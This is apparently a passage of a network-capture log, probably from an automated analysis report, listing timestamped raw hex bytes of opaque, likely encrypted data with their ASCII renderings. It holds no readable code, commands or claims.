61 4b a5 d9 9b cb df bc 7c 82 c6 55 ee c4 6c 5a f0 26 f6 e6 5d f3 01 35 44 a8 cc 01 2a 4b b8 23 8f 51 6d d2 08 74 1e af 30 ec de 06 35 d2 7f f3 a5 d2 4d 39 00 3e 1a 68 49 19 dd
                                                                                              Data Ascii: 7Uuu'{4:ASBq`0b}2X^4Z^`U!/.'##VHP0P2a/uy$:xv8~orQ!dV7uTUzu+|{Nz`a98*$#0HOXitaK|UlZ&]5D*K#Qmt05M9>hI
                                                                                              2022-01-28 18:02:09 UTC88INData Raw: 29 4b b1 2d 93 a6 78 ee fe 59 b2 21 d0 0a 8b e2 c6 5f 00 30 c0 06 ff 63 3b 32 46 5f 6f 87 52 d3 85 3a aa 91 39 eb 4f 4d 26 5b 14 ff bf 28 21 90 a5 56 52 86 2b 95 8f a1 99 95 63 4c c2 ad 78 4e f2 32 8f ad 78 99 cb 72 80 27 59 03 b9 c7 db de 9d 40 94 da 06 14 64 c4 dd 79 9f 0a 9e 53 30 01 30 cb 4e bb 8b c1 28 2a 0e 3e cd f1 c5 ba d1 d2 a9 5f c3 b1 24 da e0 18 fc 43 4b 14 53 56 2a e7 a0 83 a9 08 d0 d2 94 33 39 bc b8 ef ae 94 a1 a2 84 07 69 0b 2c 2b 91 4a 2e 52 fd 00 02 88 66 6d 55 fb 79 8f 49 58 61 6b 8d 0a c0 3c 97 9c f7 e2 e4 e6 bc b7 df cf d8 5c 93 5d fd f1 c2 26 d2 1c 70 0f 96 35 bb bf 37 f1 24 49 0c 94 06 81 f4 8c 05 8b 36 45 9f ff 70 51 36 e1 2c 47 f2 c8 6e fb af 71 1d c4 bf aa 78 33 17 d7 e2 94 a5 f4 81 56 5b cf 4f b5 76 14 e7 24 f5 d0 3c 54 5a 19 cc
                                                                                              Data Ascii: )K-xY!_0c;2F_oR:9OM&[(!VR+cLxN2xr'Y@dyS00N(*>_$CKSV*39i,+J.RfmUyIXak<\]&p57$I6EpQ6,Gnqx3V[Ov$<TZ
                                                                                              2022-01-28 18:02:09 UTC89INData Raw: b2 2b 43 60 b0 cb 03 9f 56 16 ae f3 23 d2 07 98 03 3e ef 44 d3 12 6a 8b 31 88 dc 2c 13 d2 99 6b e2 cb 00 bf 66 fa b9 28 bc e6 46 87 d3 5a 40 b0 a0 fb 63 75 e5 c2 95 4a d9 54 75 61 db ba 79 c7 0d 1c 71 bd 5d ce 92 a7 5b 1b c8 8b 07 7b 0a c3 82 44 e8 5d 2e 8d c5 d3 ac 36 3b 35 e9 2b 7f bf ee bd ed b1 a8 e8 6d aa 01 c7 b0 f7 8e 8b 31 26 e5 ec cb e8 52 59 34 e0 ab 07 9f c6 b9 56 e3 30 db 72 69 07 4d c9 70 c7 0d 2e 34 3e 10 2b 11 e5 f9 47 39 fd 64 46 af 71 1c 71 7b 71 27 cd 7b fa 30 d0 89 ba 38 49 db fa ce 7d 79 f9 8f eb 37 57 2a dd 03 a1 a7 57 65 d8 19 8f 4e 30 24 5a a7 64 5f dd c7 35 89 e2 2c c3 4a 0a 55 23 2d 52 bf 44 e9 ef 26 ec 43 e9 be d1 28 10 54 af e6 5f 43 1b f4 14 61 d4 7d 90 42 d6 66 6b e3 a2 76 50 ca 76 92 54 ae ce 8d 53 a9 d1 6e 91 b1 ac 11 4c 93
                                                                                              Data Ascii: +C`V#>Dj1,kf(FZ@cuJTuayq][{D].6;5+m1&RY4V0riMp.4>+G9dFqq{q'{08I}y7W*WeN0$Zd_5,JU#-RD&C(T_Ca}BfkvPvTSnL
                                                                                              2022-01-28 18:02:09 UTC91INData Raw: b9 e9 42 82 a6 14 24 5d 19 cf 67 13 07 c0 d9 83 dc 90 fe 06 72 a3 cd 91 d7 7d c7 99 e3 f2 1c a5 ac f2 30 3f 0e 75 1b 78 7b cd 0d e1 38 3b 62 31 db 74 60 2f 31 56 14 4f 2b 2b a4 9c b4 ca 8b 45 20 2e da 41 d0 e8 e5 d0 a7 9a 0c a1 d9 4d 22 b5 d6 38 f0 d2 84 70 97 b4 b1 c6 d5 54 46 10 aa 1f 2d 56 6e 97 81 f9 b0 a9 00 b9 64 4a 1b 66 b6 8f 9d 7d 2e 1f 42 eb 41 50 4b 7c 95 9e 72 13 91 33 89 39 e9 d4 9e ff 10 45 e7 c7 a2 84 a1 47 97 86 98 6e aa cd f1 77 b3 3b 1a 4f 13 8a 5b 28 c3 bc b2 5d 97 78 88 7c 4c cc b4 ad ea d6 e5 fe f8 0d 15 f0 c8 b2 13 0c 89 d9 84 ad 42 9f 24 33 4f b5 a2 1c 46 dc 03 9e 51 33 8d e6 4e 35 93 c3 c1 3e a5 00 5d d3 e4 4d 77 e5 b8 36 8a 5b a9 69 2d ae f6 07 e2 03 74 8b 85 a7 88 b6 c2 92 34 e5 18 4b 08 0b 2a 8c 26 58 ee ac be ce 13 7c 9f d8 e8
                                                                                              Data Ascii: B$]gr}0?ux{8;b1t`/1VO++E .AM"8pTF-VndJf}.BAPK|r39EGnw;O[(]x|LB$3OFQ3N5>]Mw6[i-t4K*&X|
                                                                                              2022-01-28 18:02:09 UTC92INData Raw: 5e 44 a3 96 3e 19 63 dc bd 17 88 df f5 06 22 6d 15 1f 87 a0 db 36 3b 9b 27 d9 09 f3 bd 1e 7b f5 c4 44 7a 70 14 6a 31 88 6f 10 89 cf 62 4a a5 06 66 36 0b 1f ca 60 6f 2a 45 ef 90 62 b4 c8 8e d0 8a 26 c8 7e 0e f7 bc 5c 9b a6 74 58 df 02 c8 c5 d8 34 45 15 c4 b1 70 38 6a 10 62 31 b2 3f e5 fe 00 41 26 27 64 63 05 06 ef 5e d9 e1 ce bc 41 eb 25 d8 e8 4b 7c 78 5e de be 34 d7 93 73 71 f6 33 61 32 44 d1 1c 41 fb 00 2f 17 de e9 b0 f5 b9 5f 43 8d 5d 17 c4 82 41 1e c0 47 9e 24 6a b8 d1 22 4d f1 ab 4c 08 2f ca 01 59 db 0d 1b c2 9f a1 15 7a 4f b3 e7 c3 38 ec 73 58 b0 c2 a4 7c 92 cb 07 3f dd f0 54 70 bb c2 32 c9 f1 d1 1c 48 f9 8c 2c 5e ad 7c 99 92 8d 44 c4 13 25 20 cb 7a b3 05 3c 2a 2d a3 1d fd f4 9b b5 4d a0 09 7a ad bb 6d 1a 4c 92 c4 0c ae c0 a7 ef 9c 08 2c 1a 79 17 73
                                                                                              Data Ascii: ^D>c"m6;'{Dzpj1obJf6`o*Eb&~\tX4Ep8jb1?A&'dc^A%K|x^4sq3a2DA/_C]AG$j"ML/YzO8sX|?Tp2H,^|D% z<*-MzmL,ys
                                                                                              2022-01-28 18:02:09 UTC93INData Raw: fe 52 ea d6 fe ed dc a9 5a df ff ba e4 cd 81 6a 93 27 cd 0f e2 43 0a 79 1e 7a 45 6f 2a 40 56 cc 1f 33 41 58 d4 96 31 8b 92 5b 25 ef 53 ef c9 f3 5c a4 d1 14 5e 2c cf da 57 27 06 cd 88 16 a1 9b 1b f0 bc d2 8d 75 dc bd 2d 2a 67 4f 84 4c 3f a6 2f b4 c5 e3 f4 eb d1 c5 0d 97 6c 59 28 21 9f f3 ec 67 e3 dd 9e fe f3 a0 19 f8 35 e2 dc 16 e1 60 3b 12 f0 2e 3a 36 36 02 6f 5a df 9e 2f c9 ad 38 06 66 cd 7b 01 66 e4 b6 da 62 b5 7f 32 c2 93 b6 c3 31 3b 0c f2 b2 67 95 2d 2d a3 df ac ff b8 28 3a 7a 17 f1 a5 d8 5b 18 8a 51 21 30 16 1f 20 63 3e 16 77 09 f1 97 88 64 81 b0 46 92 ba 5d a0 8b 25 ec 09 45 6a 8e c4 bc b4 bc dc 3c ba d2 a5 82 09 78 89 81 a9 8b 42 d1 15 c2 41 87 e0 4e c1 17 81 4c 88 df 42 66 15 66 87 3d c6 bf 27 48 e9 a8 99 82 bb ee 54 e7 22 10 1a 93 91 09 87 2d 59
                                                                                              Data Ascii: RZj'CyzEo*@V3AX1[%S\^,W'u-*gOL?/lY(!g5`;.:66oZ/8f{fb21;g--(:z[Q!0 c>wdF]%Ej<xBANLBff='HT"-Y
                                                                                              2022-01-28 18:02:09 UTC95INData Raw: 9e 17 fc ee 8f b9 38 f3 7a 60 33 db 9f 9f b1 30 02 83 32 33 77 2c a2 73 59 52 5c 54 5c 92 ff 3f 8e 8e 82 ed 6f a7 0b 36 7a 47 4f 41 fc f8 9f e2 0a 15 f6 3f e0 75 d3 7a fb 15 c5 4e b0 fe 48 07 18 1a 20 44 d1 25 dd 76 e7 5d c6 8d 20 50 0b d5 35 48 70 a1 6e 02 df fb 2f 7a bf a8 1a 78 ad 4b b3 3b a6 d0 19 69 f0 85 ba 2d 64 88 28 a8 54 95 8c e6 75 e6 45 84 51 2f 4e db 5f 55 c3 a4 01 02 16 37 79 10 3e 22 6d 18 06 63 b4 f7 3f a5 de 40 e4 44 0a 85 b7 c5 3f f4 db 23 ee ad 88 6b 04 8b a5 e6 2f 8b a1 92 43 54 9d e5 f8 37 7d 16 69 07 3b af 00 56 20 42 e3 f7 be 2b 98 a6 97 be a7 9a 43 1b 93 75 e8 6d 29 40 69 bc de 94 d5 16 72 50 cc f7 31 25 e3 1e 1c 42 e7 37 98 76 11 e4 b7 4d 4a fc e9 9d ec a0 08 39 f6 f4 d4 9e 92 8b e4 47 1c a7 b6 b6 6d ec f1 c9 3e 15 d4 a3 7d 03 22
                                                                                              Data Ascii: 8z`3023w,sYR\T\?o6zGOA?uzNH D%v] P5Hpn/zxK;i-d(TuEQ/N_U7y>"mc?@D?#k/CT7}i;V B+Cum)@irP1%B7vMJ9Gm>}"
                                                                                              2022-01-28 18:02:09 UTC96INData Raw: 0e bb eb 3c b1 98 97 76 f3 93 e0 3e 11 0d 9a 03 f6 28 2f a9 d0 d3 f6 86 50 e9 c3 42 1e 82 47 94 76 c1 61 41 78 91 68 c7 5f 0a f8 16 28 7f f6 05 03 e8 cf 07 e9 30 5d c5 9b 58 4f b0 fd a2 54 e1 03 c0 a3 67 cc 8e ce dc 4c ef 02 9d 68 01 34 a9 22 38 19 1d 43 66 7c fb b7 7b af 03 6b 1f b7 b1 13 ce ba e7 f3 45 bc dd 14 89 d9 13 43 b4 4b 9a 84 4b 99 34 33 96 74 50 30 31 8c 65 90 2f 5b ef a9 cf 15 98 42 05 c0 97 79 21 ea 4a a5 07 76 28 40 06 aa a6 e0 4f 4e 2d 22 6f f9 ea 39 6b bb 9d 1a 8d 73 d6 9a d9 d8 4b 6b 08 77 f5 5b bb 5e 4a 5b 19 f6 26 e0 6b af 63 14 2c 4a 83 88 bf a4 eb bd 1f ad 22 7a 6f 2c 12 5c 41 a0 2b 4f 8c 21 36 23 ae 12 de a0 90 d4 1d ca a2 02 83 25 93 d1 fb cd f7 32 00 45 ce be 47 43 04 e0 93 82 43 61 09 4c 81 f2 1a 3e 3a 5b 45 99 9e a0 00 05 45 09
                                                                                              Data Ascii: <v>(/PBGvaAxh_(0]XOTgLh4"8Cf|{kECKK43tP01e/[By!Jv(@ON-"o9ksKkw[^J[&kc,J"zo,\A+O!6#%2EGCCaL>:[EE
                                                                                              2022-01-28 18:02:09 UTC97INData Raw: 8d 6f ca 5d f3 e2 95 a6 32 e9 18 1e 03 cc 94 44 76 e2 cc c0 61 22 da e5 54 4b 6a 50 d0 09 80 d1 8f ed 1d 8a c1 a7 e0 e3 d9 36 4b e4 d1 85 44 fc d1 22 c4 2f 37 17 b0 17 fc 82 dc e1 42 a2 d7 d4 2e 83 7c df ea 86 14 cd a5 c8 1d d0 4a f4 93 08 2d 02 c6 60 88 81 17 2d 7e 6e 47 78 bd f7 04 33 50 c5 94 a8 e3 bd d4 4b 4e a9 3f ea 25 fa 0a 92 55 0a 1b aa d9 03 68 f7 94 58 bc a0 45 f9 cd 3e f7 ad 0b 3a 03 67 26 1d a8 9c 41 13 c6 3b e3 95 50 a4 da 0f c4 23 bd 1f a3 cd 8c 46 e2 aa c9 73 ca 8d c7 51 58 ad 6a eb c5 46 c0 30 43 4a 1a 08 d0 ed fe 85 a8 e7 29 e7 0f 82 61 ab 07 21 35 e1 91 48 a3 f6 c9 2f cb df ec f1 5b cc 0d 61 e0 6c 21 40 91 9e c0 16 27 a6 e6 b2 4e 04 ac 26 ba b5 99 95 03 74 10 3f eb 73 00 f9 d9 81 8b 46 68 cf 5b d3 61 06 c8 75 ea 98 39 2b db cc f8 95 c8
                                                                                              Data Ascii: o]2Dva"TKjP6KD"/7B.|J-`-~nGx3PKN?%UhXE>:g&A;P#FsQXjF0CJ)a!5H/[al!@'N&t?sFh[au9+
                                                                                              2022-01-28 18:02:09 UTC99INData Raw: 4a 98 20 ba a2 cd 65 1b a0 36 ec 42 5f 2d 4b 14 a7 8a af 15 c5 3a 24 18 94 d6 17 c1 6b 0d 23 0b d5 19 f0 2f 8b a8 48 ee e8 7f 21 26 51 40 ed e3 bd 0a 62 cd 39 bf 1b c8 d1 37 71 6f 18 7d c2 a2 72 72 9b 54 a2 c0 a5 6f 24 52 08 26 3a cd de 32 3c 22 5b 27 74 9d 6c e2 4d 76 56 e9 28 c8 70 a8 dc 73 d5 ff 75 82 4d 72 5f 00 7d 19 17 2e 35 b3 7a 77 2a 11 eb ec 52 75 c9 b1 6f ad 63 77 09 2e 3a 15 c1 16 aa 2e 48 4c 54 20 e3 aa 74 26 26 a3 70 7e 49 7f c5 37 67 79 3f ab 5a 40 0a a8 e8 63 09 77 b2 f9 c9 5f c3 f1 98 0b 11 db 90 03 f2 17 c2 af 49 15 b4 34 e5 ff 82 4e c3 58 fc e3 11 e7 fd 81 f2 57 06 db 07 eb bf 28 17 fc 0b e0 ee 61 5c f2 4e 25 2f 71 1c 76 5b 20 23 86 c1 2e c6 ce f0 07 e5 14 5c a3 9f a7 60 d5 cf 66 a9 76 95 57 35 8d a5 5f 04 26 17 12 b1 9a 04 4f 84 3f 24
                                                                                              Data Ascii: J e6B_-K:$k#/H!&Q@b97qo}rrTo$R&:2<"['tlMvV(psuMr_}.5zw*Ruocw.:.HLT t&&p~I7gy?Z@cw_I4NXW(a\N%/qv[ #.\`fvW5_&O?$
                                                                                              2022-01-28 18:02:09 UTC100INData Raw: 98 7e 48 bf 23 d4 98 e1 e9 b1 64 b1 4f 78 4e 25 d1 86 16 d3 3a fe 39 07 15 b6 47 7b 10 cc dd 87 a9 01 83 17 38 e9 01 bb af 7a a9 53 01 40 e0 48 67 4b 1c 73 e5 33 55 f0 14 5e 9d 0c 9a 6a cd e7 62 b2 c7 38 0a 9c 7a 08 93 be 46 a5 05 8d b7 3b 91 86 61 cd 79 cc 80 aa dd f7 c2 5b c9 ac f5 b4 fa 52 c3 b0 e9 e2 7f 31 66 e3 26 45 1b 38 e0 c0 99 88 5e 41 7c d4 f2 e0 11 c1 46 1e 97 f5 84 e4 78 9b 4d 39 e8 73 89 59 f8 19 a4 8a 6b 3d fa da eb dc ed 42 df bf 2e 36 01 bf 10 09 62 b0 f6 fc 67 fe c6 c8 3a 61 03 c3 00 b6 c8 40 b0 aa 79 00 b9 d8 7c 16 ab 65 53 d8 8e 2f 74 54 e0 11 dc 7a f2 32 49 7e 7d 0f 05 7f c0 a1 9d 16 47 08 86 bb 36 0b 2c 1d f4 1b 28 10 60 b0 6c c1 a4 88 58 ed ef de 91 5d 20 7e 4a ff 1a fb 65 db e4 05 37 8b 9b 2b ab 78 79 1f da 1a e1 b1 22 67 0a 93 fc
                                                                                              Data Ascii: ~H#dOxN%:9G{8zS@HgKs3U^jb8zF;ay[R1f&E8^A|FxM9sYk=B.6bg:a@y|eS/tTz2I~}G6,(`lX] ~Je7+xy"g
                                                                                              2022-01-28 18:02:09 UTC101INData Raw: 8e cc 47 4d b4 1d fb 76 b8 d9 03 3e 19 46 8c 09 b4 fa 38 30 aa 05 c3 23 4c f2 ab 4e f8 38 88 3c 3f 1f ca b2 c5 ae 75 7d 19 95 67 01 64 bc e0 4d da 57 b5 8d ec 2a a2 22 05 38 0c ae 19 e6 2f 2a b0 27 a0 80 58 0a 32 e7 61 01 07 92 c7 62 26 b7 6e 46 af 80 47 42 ef 4c 26 23 65 69 90 a2 be e8 a8 27 77 0a 43 88 b9 97 77 04 4c 0f 19 23 21 34 cc 62 5f ff 7f 2d 7a 89 38 c3 df 7a 85 37 39 b3 75 dc 0c ea b1 c1 18 9f 1a 45 95 22 60 4e 5e 9d 65 b0 fc f8 de d6 6d 28 13 d2 7b 5a 98 09 e2 0d 6b eb f3 d8 83 6f 28 25 d9 69 3d 1f 3a f7 60 81 a1 6d 89 8e ab f7 b3 c8 44 22 0a b7 f9 ec 68 8a 2d e3 0e c4 d4 65 b0 a1 8c fc 5f 8d 82 59 40 f4 f3 80 13 1a ad aa ec 85 fd 1f 4b 42 ef ec 97 da 4f 28 2c 32 a0 e2 f0 03 17 26 0b 0d 74 3f 6a 97 52 9d 51 9d 0e 1e ce 79 70 b9 64 2e d7 14 43
                                                                                              Data Ascii: GMv>F80#LN8<?u}gdMW*"8/*'X2ab&nFGBL&#ei'wCwL#!4b_-z8z79uE"`N^em({Zko(%i=:`mD"h-e_Y@KBO(,2&t?jRQypd.C
                                                                                              2022-01-28 18:02:09 UTC103INData Raw: 34 33 81 a5 ed ee 35 b8 d5 22 a9 93 39 ce 83 f0 c8 4e 4e c5 3a 15 7b 99 07 01 ff c5 76 56 2b 47 ef e2 40 d6 ff 4b f8 a9 5e 54 03 d1 78 9a e9 04 84 70 9f 09 94 bf cc 61 b8 e5 fb 82 d7 99 e4 dc 4f 6b 4c f4 25 2b ee 88 a0 42 5e 18 88 a9 76 5a a2 2d 46 04 d4 9d 82 7e 84 90 2c a8 8f c6 b1 05 0e 9e 1f 2b 45 ff 83 fc 32 ae 7e e1 fd d0 db e6 43 f4 b6 f1 1f d0 a0 11 16 64 d0 1f 53 a4 e1 72 7d 6e e8 5c ad fe e9 e5 31 85 a0 9b 6d 8e 44 70 3a 12 ec ae 58 bd da 91 65 3b ac c6 40 40 e3 3a af 40 1c ea 56 2f 15 c7 c3 fa 0e 70 9e 1c ec 3a f7 b2 a5 c3 fa a6 ec 6e f9 85 41 51 2d ab 72 68 4b 77 ee 61 ce 80 a5 73 84 47 61 31 d9 ed d0 39 ea bf b4 79 cc 48 f8 77 de 0b 2c 12 cf 0c 70 4b 71 f1 58 6f 12 68 ea 6e 6e 0a ab 85 34 de 7e 4a c1 a8 04 07 70 f7 fd 69 df f7 d5 fd ff 68 17
                                                                                              Data Ascii: 435"9NN:{vV+G@K^TxpaOkL%+B^vZ-F~,+E2~CdSr}n\1mDp:Xe;@@:@V/p:nAQ-rhKwasGa19yHw,pKqXohnn4~Jpih
                                                                                              2022-01-28 18:02:09 UTC104INData Raw: 87 a8 6d 9d 0e a3 7e 46 eb d5 ed cf 66 64 6c 95 59 de 60 bc d4 aa 81 a0 8b 9d f9 a0 25 9a e5 4c 99 94 30 b0 3a cc f6 c5 c1 8f 99 88 19 01 55 a0 62 56 0d 69 93 80 d7 9c fc de 09 7e e4 4e f7 b1 4f 45 90 3e 63 c1 d7 5d 24 6d 28 e1 e5 6e 5d df 35 86 bf c5 66 80 78 7b 69 76 fe 0f db f6 36 32 d1 d5 7a 90 39 e6 95 a9 c8 d7 0b 2b d3 a6 9a e7 c8 c0 02 f4 d4 67 b7 6d 14 5b db c1 44 32 71 a7 1d 24 90 19 7f 4d de 12 19 77 d7 6e 87 d8 6e 7b e9 a4 00 36 08 09 91 26 6f 7c 3e 1f ca 77 2e 4d 37 1e 4d b0 85 dd fd 63 e4 7a 06 07 38 ab 3f 91 bc 34 cf 74 8f fb e0 ad 38 bb 39 9d e9 3e ed 3d 73 0f 48 83 a5 d1 66 75 19 52 a8 d6 6b 95 2f 82 5b 3c 25 e5 31 aa 9a 8c b3 c4 4a c0 31 fa b0 61 29 2a a0 05 7a d7 99 46 44 18 5a a0 89 3e 2c f0 24 b2 b6 f1 a6 6c 63 9a 73 07 56 e0 13 e7 cb
                                                                                              Data Ascii: m~FfdlY`%L0:UbVi~NOE>c]$m(n]5fx{iv62z9+gm[D2q$Mwnn{6&o|>w.M7Mcz8?4t89>=sHfuRk/[<%1J1a)*zFDZ>,$lcsV
                                                                                              2022-01-28 18:02:09 UTC105INData Raw: d6 df 07 81 34 3e d8 51 3c 71 2e 07 87 77 c0 36 08 f1 a9 5d 47 9e e1 f8 04 bb 6e f0 32 e2 4a fe 48 f8 3e 92 cb f4 2c 11 db e9 ea 13 d1 55 16 96 9f e0 8d cf f4 ac c2 2f 3d e0 16 f7 af b4 c9 3b ee 58 dd c0 b9 4f 4e fb 6e d7 84 b3 13 4b 1b 62 91 32 c7 31 2b b3 a2 d4 aa 19 28 1f a8 66 b4 a1 a2 27 48 08 ae c6 87 d4 12 f3 ae 87 55 61 09 0e 9c 0e 79 b8 a3 6e ba 66 9c ec a7 55 63 0f e1 07 c7 0e e1 7e f9 8c 33 f5 b1 46 04 5e a7 17 c3 7e 72 5e ae 0d dc 42 15 60 dd 93 aa 87 ba 5c 92 71 29 a7 6d ed 12 5f 4c 65 0c 3b d4 a9 55 b4 df 43 36 07 3e 1c 42 6f ed ea cf 17 81 57 e0 fe a8 db f1 bb 06 13 01 0b ce b8 b6 a2 5c ae 7e c2 f8 a0 20 3c 17 f5 d5 f6 cf 43 50 ce 8c 5d b4 26 a0 5b 65 32 39 89 b7 52 cf 32 c8 13 9a 85 e9 08 a3 af 40 89 ff e7 25 2c 68 87 e9 d6 f9 3d aa 2f b5
                                                                                              Data Ascii: 4>Q<q.w6]Gn2JH>,U/=;XONnKb21+(f'HUaynfUc~3F^~r^B`\q)m_Le;UC6>BoW\~ <CP]&[e29R2@%,h=/
                                                                                              2022-01-28 18:02:09 UTC107INData Raw: 98 7e 8b 53 85 e7 fa 39 b1 38 8b a6 ef 95 b6 f3 2a 45 e4 22 50 f7 a0 27 9e f1 eb 2f a7 0d 6d 33 ae 62 81 bc 31 46 ee 68 b3 76 f5 85 e2 4a fe 0a 66 cb 7d 1d 2a ef 90 27 a0 25 b8 4b 72 4d 43 54 de 98 52 b9 86 52 a8 63 5b c5 0c a5 6e 9b 15 83 c4 85 df 01 d2 a4 d5 1c 41 01 c6 21 bd b2 52 cb 67 03 0e 9f 73 f4 4e 2e 1d a3 71 46 e3 ce b3 bd f9 c0 cf 9a 0b 23 c9 0c 94 d1 56 b8 42 e4 ae 1f cf 38 3a 22 c9 77 93 b0 2d a4 da 62 50 d3 63 dc 99 51 4d 4f 06 8e b9 da 69 90 25 ea 63 a0 78 4b 43 5d c5 db ea 50 fb be c7 db 36 61 52 45 68 d0 95 bb 69 e2 d2 f6 a5 e3 f9 97 8f ad 49 91 fa 88 cb 37 70 62 b6 f6 74 66 01 5f 42 a5 bd 26 60 b1 ad 3c 75 06 6c 49 77 d2 d7 ed a4 65 32 45 64 8f a8 60 cd 3a 21 d6 8a ab 78 7e 43 55 d9 18 b1 3a 60 2f 82 f7 8d a7 58 37 59 4d 3b 09 20 b7 d7
                                                                                              Data Ascii: ~S98*E"P'/m3b1FhvJf}*'%KrMCTRRc[nA!RgsN.qF#VB8:"w-bPcQMOi%cxKC]P6aREhiI7pbtf_B&`<ulIwe2Ed`:!x~CU:`/X7YM;
                                                                                              2022-01-28 18:02:09 UTC108INData Raw: 83 fc 8e 14 6d 28 84 1b a1 73 0a 95 bb 5d 14 09 e0 82 0a e8 62 ba 54 48 7c 87 2e 34 38 37 84 75 cd 00 84 4d d7 ea b2 25 e3 c5 38 05 7f 26 b0 c4 d4 a2 16 12 f2 15 0a 99 b8 e1 6e e4 bc 3f d8 03 0d 22 d4 7d 82 a8 39 85 a1 73 08 db 98 3c 15 90 b6 5a ee 9c 0e 93 6a a0 2b ea 7a 09 18 7b 10 24 38 f6 2b 17 94 a7 87 de ec 4b ed db 8b a1 aa 71 27 7e 73 e5 f3 1a 38 f9 eb af 84 6d 6b ef 80 b9 b1 7b 94 39 bf a6 13 c9 e9 92 a0 09 1b 4c ae 4a bf a6 1f f7 79 ce 01 33 b8 d2 0c 23 83 58 b7 63 07 38 7a 8c d5 48 c4 ba e6 31 25 23 24 09 17 ca 8e 18 8f ec 5a a0 1f ee 2b a7 5c d9 e5 ad 44 aa fd 70 25 b5 ac e0 17 17 05 1e 8d 93 86 53 69 37 87 e6 b8 16 0a 76 4e ac 11 09 26 60 b8 07 ec a5 94 c2 db 0c 74 6a 88 19 79 6f cf 95 4f a0 09 66 8a 5e 43 77 01 4a fc 08 93 aa 56 e3 cf f6 c6
                                                                                              Data Ascii: m(s]bTH|.487uM%8&n?"}9s<Zj+z{$8+Kq'~s8mk{9LJy3#Xc8zH1%#$Z+\Dp%Si7vN&`tjyoOf^CwJV
                                                                                              2022-01-28 18:02:09 UTC109INData Raw: 15 ab 0b c5 b9 1d f2 85 14 04 7a 02 d7 a3 9b 21 87 b3 4f 5c 7f 79 30 aa 10 2f b6 99 64 37 e5 5a c1 84 13 84 7b 0e 0b e3 52 a0 f5 8c 47 1c d0 b4 ae 4b 9d ca c4 47 76 e3 17 ba b5 d5 16 2c e8 3a 14 c1 dd 53 c0 23 15 08 2c a0 bd 29 05 0b 80 44 85 17 a4 57 37 79 03 a0 2f dc 71 30 93 59 57 13 e1 e3 bc 53 d6 62 17 e4 87 f4 db 2f cc 6a 46 cc 2e 06 8e 27 77 f9 13 b8 b2 fa 47 4b a5 db cb 97 24 cb 54 3e db 5f 12 80 45 67 37 a2 9b ae 10 45 d5 5f 35 3c f4 79 69 c1 f8 5c c5 4e ff 5a ac c2 ab ea 18 f7 3c 66 45 d5 b5 09 dc b7 94 96 72 96 77 e2 49 92 90 49 e0 bd 42 61 65 c3 e9 30 15 49 5c bd 70 f0 a1 66 21 bc 50 d5 68 6f ee a3 77 6c 19 71 eb d9 68 97 c9 48 7d 04 be 5d fa 46 1a a1 fb 0b 85 6b 32 c0 96 51 ee ca 6f be cc 1f b7 a1 6c c5 ee 52 fe 7f 26 bd 32 ee 59 1f 52 c4 14
                                                                                              Data Ascii: z!O\y0/d7Z{RGKGv,:S#,)DW7y/q0YWSb/jF.'wGK$T>_Eg7E_5<yi\NZ<fErwIIBae0I\pf!PhowlqhH}]Fk2QolR&2YR
                                                                                              2022-01-28 18:02:09 UTC111INData Raw: f8 58 d3 19 8d b5 9c 3d a6 d8 64 8e 65 ff 87 b4 cd 06 85 ea b2 63 38 0b f1 ad 90 6f 7a 88 54 6f 6e 1d 52 f8 2d 47 f6 0e 07 85 da 94 c5 3f dd 7d fe a9 94 05 39 73 a8 8e 22 55 d4 0b f5 8d 25 c4 e2 97 f9 0e 0a 66 94 7a 6c a7 3a 1f 1c da 49 f0 dd cf df ce e2 44 db e4 d9 6e 23 84 ca fb be 99 b5 3e ea b9 5d 24 5b 17 9b 17 1e b8 d2 9a 06 8f 93 0a 8d ac ff 6b 45 0b 14 9d bc 9f 99 73 dc 93 18 1e ab 7a 08 63 7d c8 8e 68 57 6f fe f1 59 cb 77 0d 0e 97 87 d8 9e 31 da 0b 10 53 6f 6a 74 71 1f c5 32 3b 80 5f 70 a9 ba 38 dd 9f 9c 0c f2 cc d0 d2 91 bb a5 f9 d1 ec f9 cf 96 41 95 4b 7d fe 3b 9b e5 50 2a dd b6 b2 cd 02 b6 8c 37 bd 10 e3 ce 64 52 c2 ad 46 db 77 0d 3a 87 04 8b 9e b1 09 8d 38 95 4d ba be a0 26 68 bf 94 71 12 6a 0b 29 d0 d7 e9 d1 fb 97 e5 2a 11 88 e0 ff 1b 1e d0
                                                                                              Data Ascii: X=dec8ozTonR-G?}9s"U%fzl:IDn#>]$[kEszc}hWoYw1Sojtq2;_p8AK};P*7dRFw:8M&hqj)*
                                                                                              2022-01-28 18:02:09 UTC112INData Raw: ba bf 1d c8 b5 4b 48 f4 bb d5 99 08 dd c1 28 e3 d3 20 65 80 2f a4 71 e5 fd 75 34 67 8d 2d 35 60 04 e9 3b 6d 08 fb bc e1 1b 02 b4 29 96 49 c3 9c ea b0 af 10 54 d9 13 f3 04 04 f5 ff 6e c5 73 74 20 c5 36 eb 05 76 92 4b 7c b6 cb 0d ee 5c a8 47 e6 a5 e1 9b ef 45 91 c9 6f 59 2d cf 72 73 08 76 1d 5a a1 06 8a 3b 98 96 2d 9c 02 75 1f a0 6e 9d 8c 2a f8 5a 05 57 bd 6d 79 08 29 d3 73 f5 dd f8 3d d8 6b ed 24 23 a1 9e 27 13 85 50 2b 4e 7f a2 1a 75 75 b4 c9 3b 9f af f5 2b e4 db 0f 0c 28 5a 98 32 b5 60 bc ec 52 c6 3c 92 71 8a cc 29 8b 2b 3d 8f 82 03 eb c2 27 45 52 54 38 a5 19 00 ea e5 aa cb 3e 15 5c 66 70 74 2d c5 3d a7 8b 82 39 f0 29 a6 e4 e1 5e 4f 1c 38 75 d8 63 3b da 9d 3f fd bb 61 09 18 75 e6 e5 a2 ff 6c 21 b4 c9 02 fe 8c 16 ab 7b fc 32 c4 f2 54 45 5f 45 65 3b ad 9d
                                                                                              Data Ascii: KH( e/qu4g-5`;m)ITnst 6vK|\GEoY-rsvZ;-un*ZWmy)s=k$#'P+Nuu;+(Z2`R<q)+='ERT8>\fpt-=9)^O8uc;?aul!{2TE_Ee;
